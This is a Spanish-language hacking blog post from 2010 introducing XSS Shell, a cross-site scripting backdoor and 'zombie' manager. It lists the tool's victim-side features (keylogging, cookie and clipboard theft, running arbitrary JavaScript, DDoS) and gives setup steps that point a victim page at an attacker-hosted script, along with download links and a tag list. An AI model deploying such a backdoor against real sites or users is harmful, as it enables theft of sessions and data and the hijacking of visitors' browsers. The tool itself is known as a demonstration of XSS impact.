    Autor: demonio666vip

    25 sept 2010

    [Xss Shell] Video + Tutorial

    XSS Shell es un poderoso backdoor XSS que permite obtener de forma interactiva el control de un cross-site scripting (XSS) en una aplicación web. Demuestra el poder real y el daño de los ataques de cross-site scripting.

    QUE ES UNA SHELL XSS?

    XSS Shell es un potente backdoor XSS y un administrador de zombis. Este concepto fue presentado primero por XSS-proxy (http://xss-proxy.sourceforge.net/). Normalmente, en ataques XSS el atacante tiene una oportunidad, en forma interactiva XSS Shell puede enviar peticiones y obtener respuestas de la víctima, tu puedes poner el backdoor en la página.

    Puedes robar la autentificación básica, puedes saltarse restricciones de IP en los paneles de administración, puedes realizar un DDoS en algunos sistemas con una vulnerabilidad XSS permanente, etc... posibilidades de ataque son ilimitados con buenas ideas. Básicamente esta herramienta demuestra que se puede hacer más cosas con XSS.

    CARACTERISTICAS

    XSS Shell tiene varias características para tener acceso a toda víctima. También puede simplemente añadir sus propios comandos.

    La mayoría de las características se pueden habilitar o deshabilitar desde la configuración o pueden ser ajustado desde el código fuente.

    Características:

    • Páginas de regeneración
    • Keylogger
    • Mouse Logger (click points + DOM actual)

    Incorporado en los comandos:

    • Obtener datos con Keylogger.
    • Obtener la página actual (obtener DOM actual / como una captura de pantalla).
    • Obtener Cookie.
    • Ejecutar JavaScript suministrado (eval).
    • Obtener Portapapeles (sólo para IE).
    • Obtener dirección IP interna (sólo Firefox + JVM ).
    • Revisar las víctimas que visitaron el historial de URL.
    • DDoS.
    • Forzar la caída del navegador de la víctima.

    INSTALACIÓN

    XSS Shell utiliza ASP + base de datos MS Access como backend, pero puedes simplemente ponerlo en cualquier otra solución de servidor. Sólo tiene que seguir con el protocolo de comunicación simple.

    Instalar la interfaz de administración:

    1. Copiar "xssshell" carpeta en su servidor web
    2. Copiar "db" a un lugar seguro (por debajo de la raíz)
    3. Configurar "ruta de acceso base de datos" de "xssshell/db.asp"
    4. Modificar fuertemente codificados la contraseña en db.asp [contraseña por defecto es: w00t
    5. Ahora usted puedes tener acceso a la interfaz de administración de algo como http://[YOURHOST]/xssshell/

    Configurar XSS Shell para la comunicación:

    1. Abrir xssshell.asp
    2. Elegir la variable "SERVER"  a la carpeta donde se encuentra XSSShell. i.e: "http://[YOURHOST]/xssshell/";
    3. Asegúrese de revisar "ME", "Conexión", "COMMANDS_URL" variables. Si ha cambiado los nombres de archivo, nombres de carpetas o algún tipo de configuración diferente que necesita modificarlos.
    Ahora abra su interfaz de administración desde el navegador. Para probarlo, basta con modificar "sample_victim/default.asp" código fuente y reemplazar "http://attacker:81/release/xssshell.js" URL con su propia URL del tipo XSS Shell. Abrir "sample_victim" carpeta en cualquier otro navegador y puede ser subido a otro servidor.
    Ahora debería poder ver un zombi en la interfaz de administración. Sólo tiene que escribir algo de texto en el área "parámetros" y haga clic en "alert ()". Usted debe ver un mensaje de alerta en el navegador de la víctima.


    Video De Una Xss Shell Funcionando:





    Descargar XSS Shell v0.3.9:
    http://www.portcullis-security.com/tools/free/XSSShell039.zip
    o
    http://ferruh.mavituna.com/xssshell/download/xssshellv039.zip


    Vía: http://0verflow.diosdelared.com/
    Fuente: http://www.darknet.org.uk/

    Temas Relacionados:
    [BeEFYPROXY] Interceptar el trafico WEB (MITM)
    [BeEF] Tutorial

    [+] Salu2

    Labels

    0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

     
    biz.